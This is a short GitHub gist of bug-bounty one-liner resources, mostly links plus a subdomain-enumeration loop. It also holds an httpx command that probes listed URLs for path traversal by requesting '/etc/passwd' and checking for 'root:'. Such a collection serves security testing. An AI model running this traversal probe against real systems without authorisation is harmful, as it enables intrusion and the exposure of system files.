Skip to content

Instantly share code, notes, and snippets.

@ruevaughn
Last active July 8, 2022 13:40
Show Gist options
  • Save ruevaughn/124401ad38cf7a0a8566f5ca05323220 to your computer and use it in GitHub Desktop.
Save ruevaughn/124401ad38cf7a0a8566f5ca05323220 to your computer and use it in GitHub Desktop.
onelineerz
https://medium.com/cyberverse/bug-bounty-with-bash-438596ff72f5
while read sub; do if host “$sub.example.com” &> /dev/null; then echo “$sub.example.com”; fi; done < subdomains_wordlist.txt
[Alterenative one-lizers[(https://www.gnu.org/software/datamash/alternatives/)
https://kathan19.gitbook.io/howtohunt/subdomain-takeover/easy_methods
https://twitter.com/bashoneliners
https://www.rexegg.com/regex-perl-one-liners.html
httpx -l url.txt -path "///////../../../../../../etc/passwd" -status-code -mc 200 -ms 'root:'
https://github.com/KingOfBugbounty/KingOfBugBountyTips#oneliner-haklistgen
https://www.bashoneliners.com/
https://linuxsecurity.expert/kb/one-liners/
https://gist.github.com/w00tc/486825a0b7c593789b1952878dd86ff5
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment